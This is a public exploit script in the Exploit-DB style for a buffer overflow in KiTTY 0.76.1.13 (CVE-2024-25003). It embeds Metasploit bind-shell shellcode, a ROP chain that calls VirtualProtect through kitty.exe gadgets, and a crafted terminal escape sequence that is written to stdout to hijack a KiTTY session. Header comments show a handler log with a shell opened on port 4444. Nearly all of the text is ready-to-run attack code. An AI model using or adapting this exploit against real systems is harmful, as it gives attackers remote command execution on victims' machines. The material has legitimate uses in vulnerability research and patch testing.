# Exploit Title: KiTTY 0.76.1.13 - 'Start Duplicated Session Hostname' Buffer Overflow # Exploit Author: DEFCESCO (Austin A. DeFrancesco) # Vendor Homepage: https://github.com/cyd01/KiTTY/= # Software Link: https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip # Version: ≤ 0.76.1.13 # Tested on: Microsoft Windows 11/10/8/7/XP # CVE: 2024-25003 #-------------------------------------------------------------------------------------# # Blog: https://blog.DEFCESCO.io/Hell0+KiTTY #-------------------------------------------------------------------------------------# # msf6 payload(windows/shell_bind_tcp) > to_handler # # [*] Payload Handler Started as Job 1 # # msf6 payload(windows/shell_bind_tcp) > # # [*] Started bind TCP handler against 192.168.100.28:4444 # # [*] Command shell session 1 opened (192.168.100.119:39315 -> 192.168.100.28:4444) # #-------------------------------------------------------------------------------------# import sys import os import struct #---------------------------------------------------------------------------------------------# # msf6 payload(windows/shell_bind_tcp) > generate -b '\x00\x07\x0a\x0d\x1b\x9c\x3A\x40' -f py # # windows/shell_bind_tcp - 375 bytes # # https://metasploit.com/ # # Encoder: x86/xor_poly # # VERBOSE=false, LPORT=4444, RHOST=192.168.100.28, # # PrependMigrate=false, EXITFUNC=process, CreateSession=true, # # AutoVerifySession=true # #---------------------------------------------------------------------------------------------# buf = b"" buf += b"\x51\x53\x56\x57\xdb\xd9\xd9\x74\x24\xf4\x5f\x41" buf += b"\x49\x31\xc9\x51\x59\x90\x90\x81\xe9\xae\xff\xff" buf += b"\xff\xbe\xd4\xa1\xc4\xf4\x31\x77\x2b\x83\xef\xfc" buf += b"\x51\x59\x90\xff\xc9\x75\xf3\x5f\x5e\x5b\x59\x28" buf += b"\x49\x46\xf4\xd4\xa1\xa4\x7d\x31\x90\x04\x90\x5f" buf += b"\xf1\xf4\x7f\x86\xad\x4f\xa6\xc0\x2a\xb6\xdc\xdb" buf += b"\x16\x8e\xd2\xe5\x5e\x68\xc8\xb5\xdd\xc6\xd8\xf4" buf += b"\x60\x0b\xf9\xd5\x66\x26\x06\x86\xf6\x4f\xa6\xc4" buf += b"\x2a\x8e\xc8\x5f\xed\xd5\x8c\x37\xe9\xc5\x25\x85" buf += b"\x2a\x9d\xd4\xd5\x72\x4f\xbd\xcc\x42\xfe\xbd\x5f" buf += b"\x95\x4f\xf5\x02\x90\x3b\x58\x15\x6e\xc9\xf5\x13" buf += b"\x99\x24\x81\x22\xa2\xb9\x0c\xef\xdc\xe0\x81\x30" buf += b"\xf9\x4f\xac\xf0\xa0\x17\x92\x5f\xad\x8f\x7f\x8c" buf += b"\xbd\xc5\x27\x5f\xa5\x4f\xf5\x04\x28\x80\xd0\xf0" buf += b"\xfa\x9f\x95\x8d\xfb\x95\x0b\x34\xfe\x9b\xae\x5f" buf += b"\xb3\x2f\x79\x89\xc9\xf7\xc6\xd4\xa1\xac\x83\xa7" buf += b"\x93\x9b\xa0\xbc\xed\xb3\xd2\xd3\x5e\x11\x4c\x44" buf += b"\xa0\xc4\xf4\xfd\x65\x90\xa4\xbc\x88\x44\x9f\xd4" buf += b"\x5e\x11\x9e\xdc\xf8\x94\x16\x29\xe1\x94\xb4\x84" buf += b"\xc9\x2e\xfb\x0b\x41\x3b\x21\x43\xc9\xc6\xf4\xc5" buf += b"\xfd\x4d\x12\xbe\xb1\x92\xa3\xbc\x63\x1f\xc3\xb3" buf += b"\x5e\x11\xa3\xbc\x16\x2d\xcc\x2b\x5e\x11\xa3\xbc" buf += b"\xd5\x28\xcf\x35\x5e\x11\xa3\x43\xc9\xb1\x9a\x99" buf += b"\xc0\x3b\x21\xbc\xc2\xa9\x90\xd4\x28\x27\xa3\x83" buf += b"\xf6\xf5\x02\xbe\xb3\x9d\xa2\x36\x5c\xa2\x33\x90" buf += b"\x85\xf8\xf5\xd5\x2c\x80\xd0\xc4\x67\xc4\xb0\x80" buf += b"\xf1\x92\xa2\x82\xe7\x92\xba\x82\xf7\x97\xa2\xbc" buf += b"\xd8\x08\xcb\x52\x5e\x11\x7d\x34\xef\x92\xb2\x2b" buf += b"\x91\xac\xfc\x53\xbc\xa4\x0b\x01\x1a\x34\x41\x76" buf += b"\xf7\xac\x52\x41\x1c\x59\x0b\x01\x9d\xc2\x88\xde" buf += b"\x21\x3f\x14\xa1\xa4\x7f\xb3\xc7\xd3\xab\x9e\xd4" buf += b"\xf2\x3b\x21" def shellcode(): sc = b'' sc += b'\xBB\x44\x24\x44\x44' # mov ebx,0x44442444 sc += b'\xB8\x44\x44\x44\x44' # mov eax,0x44444444 sc += b'\x29\xD8' # sub eax,ebx sc += b'\x29\xC4' # sub esp,eax sc += buf sc += b'\x90' * (1052-len(sc)) assert len(sc) == 1052 return sc def create_rop_chain(): # rop chain generated with mona.py - www.corelan.be rop_gadgets = [ #[---INFO:gadgets_to_set_esi:---] 0x004c5832, # POP EAX # ADD ESP,14 # POP EBX # POP ESI # RETN [kitty.exe] 0x006424a4, # ptr to &VirtualProtect() [IAT kitty.exe] 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x00484e07, # MOV EAX,DWORD PTR DS:[EAX] # RETN [kitty.exe] 0x00473cf6, # XCHG EAX,ESI # RETN [kitty.exe] #[---INFO:gadgets_to_set_ebp:---] 0x00429953, # POP EBP # RETN [kitty.exe] 0x005405b0, # push esp; ret 0 [kitty.exe] #[---INFO:gadgets_to_set_ebx:---] 0x0049d9f9, # POP EBX # RETN [kitty.exe] 0x00000201, # 0x00000201-> ebx #[---INFO:gadgets_to_set_edx:---] 0x00430dce, # POP EDX # RETN [kitty.exe] 0x00000040, # 0x00000040-> edx #[---INFO:gadgets_to_set_ecx:---] 0x005ac58c, # POP ECX # RETN [kitty.exe] 0x004d81d9, # &Writable location [kitty.exe] #[---INFO:gadgets_to_set_edi:---] 0x004fa404, # POP EDI # RETN [kitty.exe] 0x005a2001, # RETN (ROP NOP) [kitty.exe] #[---INFO:gadgets_to_set_eax:---] 0x004cd011, # POP EAX # POP EBX # RETN [kitty.exe] 0x90909090, # nop 0x41414141, # Filler (compensate) #[---INFO:pushad:---] 0x005dfbac, # PUSHAD # RETN [kitty.exe] ] return b''.join(struct.pack('<I', _) for _ in rop_gadgets) rop_chain = create_rop_chain() #----------------------------------------------------------------------------------# # Badchars: \x00\x07\x0a\x0d\x1b\x9c\x3A\x40 # # Return Address Information: 0x0052033c : {pivot 332 / 0x14c} : # # ADD ESP,13C # POP EBX # POP ESI # POP EDI # POP EBP # RETN # # ** [kitty.exe] ** | startnull,ascii {PAGE_EXECUTE_READWRITE} # # Shellcode size at ESP: 1052 # #----------------------------------------------------------------------------------# return_address = struct.pack('<I', 0x0052033c) # ADD ESP,13C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [kitty.exe] ** | startnull,ascii {PAGE_EXECUTE_READWRITE} rop_chain_padding = b'\x90' * 35 nops = b'\x90' * 88 escape_sequence = b'\033]0;__dt:' + shellcode() + return_address escape_sequence += rop_chain_padding + rop_chain escape_sequence += b'\x90' escape_sequence += b"\xE9\x2A\xFA\xFF\xFF" #jmp $eip-1490 escape_sequence += nops + b'\007' stdout = os.fdopen(sys.stdout.fileno(), 'wb') stdout.write(escape_sequence) stdout.flush()